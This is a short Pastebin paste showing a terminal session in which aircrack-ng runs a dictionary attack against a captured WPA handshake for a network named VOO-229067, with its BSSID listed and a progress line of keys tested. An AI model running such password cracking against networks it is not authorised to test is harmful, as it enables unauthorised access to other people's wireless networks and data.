Advertisement
Guest User

Untitled

a guest
Aug 19th, 2017
76
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.37 KB | None | 0 0
  1. # aircrack-ng -p 14 -w dic.txt extract.cap
  2. Opening extract.cap
  3. Read 14 packets.
  4.  
  5. # BSSID ESSID Encryption
  6.  
  7. 1 A0:21:B7:4D:18:91 VOO-229067 WPA (1 handshake)
  8.  
  9. Choosing first network as target.
  10.  
  11.  
  12.  
  13. Aircrack-ng 0.6.2
  14.  
  15.  
  16. [00:00:14] 14002 keys tested (980.25 k/s)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement